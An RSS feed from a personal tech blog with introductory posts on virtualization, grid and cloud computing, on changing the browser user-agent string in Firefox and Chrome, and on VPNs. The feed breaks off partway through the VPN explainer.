<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Arpit Tripathi&#039;s Blog</title>
	<atom:link href="http://z3roday.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://z3roday.wordpress.com</link>
	<description>CAN I -&#62; Constant And Never-ending Improvement</description>
	<lastBuildDate>Thu, 17 Nov 2011 18:02:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='z3roday.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Arpit Tripathi&#039;s Blog</title>
		<link>http://z3roday.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://z3roday.wordpress.com/osd.xml" title="Arpit Tripathi&#039;s Blog" />
	<atom:link rel='hub' href='http://z3roday.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Virtualization, Grid &amp; Cloud Computing &#8211; Basics</title>
		<link>http://z3roday.wordpress.com/2010/12/13/virtualization-grid-cloud-computing-basics/</link>
		<comments>http://z3roday.wordpress.com/2010/12/13/virtualization-grid-cloud-computing-basics/#comments</comments>
		<pubDate>Mon, 13 Dec 2010 14:52:48 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Cloud & Grid Computing]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=154</guid>
		<description><![CDATA[Virtualization You maybe know a little about virtualization if you have ever use a software to allow a piece of hardware to run multiple operating system images at the same time. A large cluster of servers does not essentially constitute a grid. In order to manage those resources, virtualization is required so that resources are [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=154&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:left;" class="getsocial"><a title="Like This!" href="http://getsociallive.com/gslike.php?likeurl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F&amp;liketitle=User%20Agent%20Spoofing" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/04/gslk3.png?w=49&#038;h=23" width="49" height="23" alt="Like This!" /></a></p>
<h4>Virtualization</h4>
<p>You maybe know a little about virtualization if you have ever use a software to allow a piece of hardware to run multiple operating system images at the same time. A large cluster of servers does not essentially constitute a grid. In order to manage those resources, virtualization is required so that resources are aggregated, and expanded or pulled back as the computational, storage, or bandwidth requirements of applications change. Virtualization can be performed at three levels:<br />
<strong>Network virtualization</strong> is a technique of combining the existing resources in a network by splitting up the available bandwidth into channels, each of which is independent from the others, and each of which can be assigned (or reassigned) to a particular server or device in real time. The idea is that virtualization hides the factual complexity of the network by separating it into manageable parts, much like your partitioned hard drive makes it easier to manage your files.<br />
<strong>Server virtualization</strong> uses software that allows a server to be logically partitioned so that applications have a dedicated space in which to execute. The partitions and underlying resources are constantly balanced, based on the requirements of applications running on it. The purpose is to spare the user from having to understand and manage complicated details of server resources while increasing resource sharing and utilization and maintaining the capacity to expand later.<br />
<strong>Storage virtualization</strong> is the pooling of physical storage from multiple network storage devices into what appears to be a single storage device that is managed from a central console.</p>
<h4>Grid Computing</h4>
<p>When hundreds or thousands of servers are clustered and managed as a single massive computing resource, the processing power available for use is enormous. Grid computing is the act of sharing tasks over multiple computers. Tasks can range from data storage to complex calculations and can be spread over large geographical distances. Grids are often constructed with the aid of general-purpose grid software libraries known as<strong> middleware</strong>. Grids allow customers to pay only for the processing capability, storage, and network bandwidth they use.<br />
Grid computing can be thought of as distributed and large-scale cluster computing and as a form of network-distributed parallel processing. Grid computing is similar to cluster computing, but there are a number of distinct differences. In a grid, there is no centralized management; computers in the grid are independently controlled, and can perform tasks unrelated to the grid at the operator&#8217;s discretion. The computers in a grid are not required to have the same operating system or hardware. Grids are also usually loosely connected, often in a decentralized network, rather than contained in a single location, as computers in a cluster often are.</p>
<h4>Cloud computing</h4>
<p>If you have an e-mail account with a Web-based e-mail service like Hotmail, Yahoo! Mail or Gmail, then you&#8217;ve had some experience with cloud computing. Instead of running an e-mail program on your computer, you log in to a Web e-mail account. The software and storage for your account doesn&#8217;t exist on your computer, it&#8217;s on the service&#8217;s computer cloud. Cloud computing is closely related to grid computing. Cloud computing requires that a grid already be established because the foundation of a cloud computing environment is a grid. Clouds have the same operational necessities and customer expectations as grids, with regard to security, data protection, isolation, performance, and availability.  In a grid computing system, networked computers are able to access and use the resources of every other computer on the network. In cloud computing systems, that usually only applies to the back end. Rather than having a focus on platform middleware, server hardware, network and storage resources, cloud computing is the offering of services without exposing the grid and how it is managed.</p>
<p style="text-align:left;" class="getsocial"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1001.png?w=614" alt="" /><a title="Add to Facebook" href="http://www.facebook.com/sharer.php?u=http://z3roday.wordpress.com/2010/12/13/virtualization-grid-cloud-computing-basics/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1011.png?w=614" alt="Add to Facebook" /></a><a title="Add to Digg" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F12%2F13%2Fvirtualization-grid-cloud-computing-basics%2F&amp;title=Virtualization%2C%20Grid%20%26%20Cloud%20Computing%20%E2%80%93%20Basics" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1021.png?w=614" alt="Add to Digg" /></a><a title="Add to Del.icio.us" href="http://del.icio.us/post?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F12%2F13%2Fvirtualization-grid-cloud-computing-basics%2F&amp;title=Virtualization%2C%20Grid%20%26%20Cloud%20Computing%20%E2%80%93%20Basics" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1031.png?w=614" alt="Add to Del.icio.us" /></a><a title="Add to Stumbleupon" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F12%2F13%2Fvirtualization-grid-cloud-computing-basics%2F&amp;title=Virtualization%2C%20Grid%20%26%20Cloud%20Computing%20%E2%80%93%20Basics" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1041.png?w=614" alt="Add to Stumbleupon" /></a><a title="Add to Reddit" href="http://reddit.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F12%2F13%2Fvirtualization-grid-cloud-computing-basics%2F&amp;title=Virtualization%2C%20Grid%20%26%20Cloud%20Computing%20%E2%80%93%20Basics" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1051.png?w=614" alt="Add to Reddit" /></a><a title="Add to Blinklist" href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Description=&amp;Url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F12%2F13%2Fvirtualization-grid-cloud-computing-basics%2F&amp;Title=Virtualization%2C%20Grid%20%26%20Cloud%20Computing%20%E2%80%93%20Basics" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1061.png?w=614" alt="Add to Blinklist" /></a><a title="Add to Twitter" href="http://twitter.com/home/?status=Virtualization%2C%20Grid%20%26%20Cloud%20Computing%20%E2%80%93%20Basics+%40+http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F12%2F13%2Fvirtualization-grid-cloud-computing-basics%2F" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1071.png?w=614" alt="Add to Twitter" /></a><a title="Add to Technorati" href="http://www.technorati.com/faves?add=http://z3roday.wordpress.com/2010/12/13/virtualization-grid-cloud-computing-basics/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1081.png?w=614" alt="Add to Technorati" /></a><a title="Add to Yahoo Buzz" href="http://buzz.yahoo.com/buzz?targetUrl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F12%2F13%2Fvirtualization-grid-cloud-computing-basics%2F&amp;headline=Virtualization%2C%20Grid%20%26%20Cloud%20Computing%20%E2%80%93%20Basics" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1091.png?w=614" alt="Add to Yahoo Buzz" /></a><a title="Add to Newsvine" href="http://www.newsvine.com/_wine/save?u=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F12%2F13%2Fvirtualization-grid-cloud-computing-basics%2F&amp;h=Virtualization%2C%20Grid%20%26%20Cloud%20Computing%20%E2%80%93%20Basics" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1101.png?w=614" alt="Add to Newsvine" /></a><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/08/gs1111.png?w=614" alt="" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/154/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=154&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/12/13/virtualization-grid-cloud-computing-basics/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/04/gslk3.png" medium="image">
			<media:title type="html">Like This!</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1001.png" medium="image" />

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1011.png" medium="image">
			<media:title type="html">Add to Facebook</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1021.png" medium="image">
			<media:title type="html">Add to Digg</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1031.png" medium="image">
			<media:title type="html">Add to Del.icio.us</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1041.png" medium="image">
			<media:title type="html">Add to Stumbleupon</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1051.png" medium="image">
			<media:title type="html">Add to Reddit</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1061.png" medium="image">
			<media:title type="html">Add to Blinklist</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1071.png" medium="image">
			<media:title type="html">Add to Twitter</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1081.png" medium="image">
			<media:title type="html">Add to Technorati</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1091.png" medium="image">
			<media:title type="html">Add to Yahoo Buzz</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1101.png" medium="image">
			<media:title type="html">Add to Newsvine</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/08/gs1111.png" medium="image" />
	</item>
		<item>
		<title>User Agent Spoofing</title>
		<link>http://z3roday.wordpress.com/2010/07/13/user-agent-spoofing/</link>
		<comments>http://z3roday.wordpress.com/2010/07/13/user-agent-spoofing/#comments</comments>
		<pubDate>Tue, 13 Jul 2010 05:32:49 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=139</guid>
		<description><![CDATA[Sometimes, you might encounter problem of accessing a website, just because the web server doesn’t recognize or allow that web browser (client program) you used to access the site. Some of you might recall Google Chrome version earlier than 0.4.154.33 encountered problem with Windows Live Mail (a.k.a. hotmail), as the Microsoft free webmail system didn’t [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=139&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:left;" class="getsocial"><a title="Like This!" href="http://getsociallive.com/gslike.php?likeurl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F&amp;liketitle=User%20Agent%20Spoofing" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/04/gslk3.png?w=49&#038;h=23" width="49" height="23" alt="Like This!" /></a></p>
<p>Sometimes, you might encounter problem of accessing a website, just because the web server doesn’t recognize or allow that web browser (client program) you used to access the site. Some of you might recall Google Chrome version earlier than 0.4.154.33 encountered problem with Windows Live Mail (a.k.a. hotmail), as the Microsoft free webmail system didn’t properly recognize this. <strong>User-Agent spoofer/switcher</strong> extension/addons allows users to access sites which lock contents to certain browsers .</p>
<p><strong>Fix It For Firefox:</strong></p>
<p>The <strong>User Agent Switcher addon</strong> adds a menu and a toolbar button to switch the user agent of the browser. The typical usage is to allow access to sites that restrict access based on the browser being used. To switch the user agent of the browser select a user agent in the &#8216;User Agent Switcher&#8217; menu under the &#8216;Tools&#8217; menu of the browser. To customize the list of user agents select &#8216;Edit User Agents&#8230;&#8217; under the &#8216;User Agent Switcher&#8217; menu.</p>
<p>Download User Agent Switcher Extension from here <a href="https://addons.mozilla.org/en-US/firefox/addon/59/">https://addons.mozilla.org/en-US/firefox/addon/59/</a></p>
<p><strong>Alternate Method:</strong><br />
1. Open Firefox web browser, type about:config in the address bar and press ENTER.<br />
2. You might see some text titled “Here be dragons!”, just click the only button to proceed. Now, you should see a page of Firefox settings (known as Preference). Right click on the page, select New follow by String.<br />
3. In the New String Value dialog box, enter the preference name <strong>general.useragent.override</strong> and click OK.<br />
4. The next dialog box appears, this time prompt for a value for the Preference name defined in previous step – enter the user agent string of your choice here:</p>
<p>Now, you should close all the Firefox windows. Upon reopen, the new user agent string specified in general.useragent.override should be effective. To verify it, type about: in the address bar and press enter.</p>
<p><strong>Fix It For Chrome:</strong></p>
<p><strong>Chromeleon</strong> is a user agent switcher extension for Google chrome. This extension allows users to change the user agent string passed by Chrome to mock any browser they wish. This user-agent spoofer extension allows Chrome users to access sites which lock contents to certain browsers or intentionally block chrome. Also you can set a specific filtering list, so that Chromeleon will automatically switch user-agent strings based on the domain or URL specified.</p>
<p><strong>Features of Chromeleon User agent Switcher extension: </strong>One click Useragent changer, Can add specific URL filter list, Add custom user agent strings</p>
<p>Only problem with this extension is that it does not modify HTTP headers, so sites which sniff useragents at network level could see through the spoofing.</p>
<p>Download Chromeleon Extension from here <a href="https://chrome.google.com/extensions/detail/aafciojnlamllgpkpdkbamkfgbofhgcj">https://chrome.google.com/extensions/detail/aafciojnlamllgpkpdkbamkfgbofhgcj</a></p>
<p><strong>Alternate Method:</strong><br />
1. Chrome browser spoofing could also be done from command line without installing the extension.<br />
2. Create a new shortcut for chrome and add  <strong>&#8211;user-agent=&#8221;custom string&#8221;</strong> to the target of this shortcut [e.g. <strong>C:\Users\XXXX\AppData\Local\Google\Chrome\Application\chrome.exe --user-agent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)"</strong> ].<br />
3. Now run chrome using this shortcut.</p>
<p style="text-align:left;" class="getsocial"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1001.png?w=614" alt="" /><a title="Add to Facebook" href="http://www.facebook.com/sharer.php?u=http://z3roday.wordpress.com/2010/07/13/user-agent-spoofing/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1011.png?w=614" alt="Add to Facebook" /></a><a title="Add to Digg" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F&amp;title=User%20Agent%20Spoofing" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1021.png?w=614" alt="Add to Digg" /></a><a title="Add to Del.icio.us" href="http://del.icio.us/post?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F&amp;title=User%20Agent%20Spoofing" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1031.png?w=614" alt="Add to Del.icio.us" /></a><a title="Add to Stumbleupon" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F&amp;title=User%20Agent%20Spoofing" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1041.png?w=614" alt="Add to Stumbleupon" /></a><a title="Add to Reddit" href="http://reddit.com/submit?url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F&amp;title=User%20Agent%20Spoofing" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1051.png?w=614" alt="Add to Reddit" /></a><a title="Add to Blinklist" href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Description=&amp;Url=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F&amp;Title=User%20Agent%20Spoofing" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1061.png?w=614" alt="Add to Blinklist" /></a><a title="Add to Twitter" href="http://twitter.com/home/?status=User%20Agent%20Spoofing+%40+http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1071.png?w=614" alt="Add to Twitter" /></a><a title="Add to Technorati" href="http://www.technorati.com/faves?add=http://z3roday.wordpress.com/2010/07/13/user-agent-spoofing/" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1081.png?w=614" alt="Add to Technorati" /></a><a title="Add to Yahoo Buzz" href="http://buzz.yahoo.com/buzz?targetUrl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F&amp;headline=User%20Agent%20Spoofing" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1091.png?w=614" alt="Add to Yahoo Buzz" /></a><a title="Add to Newsvine" href="http://www.newsvine.com/_wine/save?u=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F13%2Fuser-agent-spoofing%2F&amp;h=User%20Agent%20Spoofing" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1101.png?w=614" alt="Add to Newsvine" /></a><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2009/08/gs1111.png?w=614" alt="" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/z3roday.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/z3roday.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/z3roday.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/z3roday.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/z3roday.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/z3roday.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/z3roday.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/z3roday.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/z3roday.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/z3roday.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/z3roday.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/z3roday.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/z3roday.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/z3roday.wordpress.com/139/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=139&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://z3roday.wordpress.com/2010/07/13/user-agent-spoofing/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bdbae9c0f29973780386f48c8df00aed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">achieveriiitm</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2010/04/gslk3.png" medium="image">
			<media:title type="html">Like This!</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1001.png" medium="image" />

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1011.png" medium="image">
			<media:title type="html">Add to Facebook</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1021.png" medium="image">
			<media:title type="html">Add to Digg</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1031.png" medium="image">
			<media:title type="html">Add to Del.icio.us</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1041.png" medium="image">
			<media:title type="html">Add to Stumbleupon</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1051.png" medium="image">
			<media:title type="html">Add to Reddit</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1061.png" medium="image">
			<media:title type="html">Add to Blinklist</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1071.png" medium="image">
			<media:title type="html">Add to Twitter</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1081.png" medium="image">
			<media:title type="html">Add to Technorati</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1091.png" medium="image">
			<media:title type="html">Add to Yahoo Buzz</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1101.png" medium="image">
			<media:title type="html">Add to Newsvine</media:title>
		</media:content>

		<media:content url="http://getsocialserver.files.wordpress.com/2009/08/gs1111.png" medium="image" />
	</item>
		<item>
		<title>Virtual Private Networks</title>
		<link>http://z3roday.wordpress.com/2010/07/11/virtual-private-networks/</link>
		<comments>http://z3roday.wordpress.com/2010/07/11/virtual-private-networks/#comments</comments>
		<pubDate>Sun, 11 Jul 2010 20:37:16 +0000</pubDate>
		<dc:creator>Arpit Tripathi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://z3roday.wordpress.com/?p=125</guid>
		<description><![CDATA[VPN (Virtual Private Networks) gives enormously secure connections between private networks linked through the Internet. It allows remote computers to act as though they were on the same secure, local network. VPNs enable file sharing, video conferencing and similar network services. Virtual private networks generally don&#8217;t provide any new functionality that isn&#8217;t already offered through [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=z3roday.wordpress.com&amp;blog=13935263&amp;post=125&amp;subd=z3roday&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:left;" class="getsocial"><a title="Like This!" href="http://getsociallive.com/gslike.php?likeurl=http%3A%2F%2Fz3roday.wordpress.com%2F2010%2F07%2F11%2Fvirtual-private-networks%2F&amp;liketitle=Virtual%20Private%20Networks" rel="nofollow" target="_blank"><img style="border:0;margin:0;padding:0;" src="http://getsocialserver.files.wordpress.com/2010/04/gslk4.png?w=49&#038;h=23" width="49" height="23" alt="Like This!" /></a></p>
<p><strong>VPN (Virtual Private Networks)</strong> gives enormously secure connections between private networks linked through the Internet. It allows remote computers to act as though they were on the same secure, local network. VPNs enable file sharing, video conferencing and similar network services. Virtual private networks generally don&#8217;t provide any new functionality that isn&#8217;t already offered through alternative mechanisms, but a VPN implements those services more efficiently / cheaply in most cases. The VPN can be found in workplaces and homes, where they allow employees to safely log into company networks. Telecommuters and those who travel often find a VPN a more suitable way to stay connected to the corporate intranet. No matter your current involvement with VPNs, this is a good technology to know something about. So here it goes…</p>
<p>Imagine thousands of islands in a huge ocean, some are very close to each other and some are very far. The regular way to travel from one island to another is to take a boat from one island to another. Of course, traveling on a boat means that you have almost no privacy. Anything you do can be seen by someone else. We can assume each island as a private LAN and the ocean is the Internet. Traveling by boat is like connecting to a other LAN through the Internet. We have no control over the wires and routers that make up the Internet. </p>
<p>Now suppose an island has a bridge to another island so that there is easier, more secure and direct way for people to travel between the two. It is expensive to build and maintain the bridge, even though the island you are connecting with is very close. But the need for a reliable, secure path is so great that you have to do it anyway. This is very much like having a leased line. The bridges (leased lines) are separate from the ocean (Internet), yet are able to connect the islands (LANs). Many companies have chosen this route because of the need for security and reliability in connecting their remote offices. However, if the offices are very far apart, the cost can be prohibitively high -just like trying to build a bridge that spans a great distance.</p>
<p>Now suppose each resident of an island has a small submarine with some amazing properties. It&#8217;s fast, It&#8217;s easy to take with you wherever you go, It&#8217;s able to completely hide you from any other boats or submarines. Although residents are traveling in the ocean along with other traffic, they could travel back and forth whenever they wanted to with privacy and security. That&#8217;s essentially how a VPN works. Each remote member of network can communicate in a secure and reliable manner using the Internet as the medium to connect to the private LAN. A VPN can grow to accommodate more users and different locations much easier than a leased line. In fact, scalability is a major advantage that VPNs have over typical leased lines. Unlike with leased lines, where the cost increases in proportion to the distances involved, the geographic locations of each office matter little in the creation of a VPN.</p>
<p><strong>Advantages Of VPN</strong><br />
1. Allows you to be at home and access your company&#8217;s computers in the same way as if you were sitting at work.<br />
2. Almost impossible for someone to tap or interfer with data in the VPN tunnel.<br />
3. If you have VPN client software on a laptop, you can connect to your company from anywhere in the world.</p>
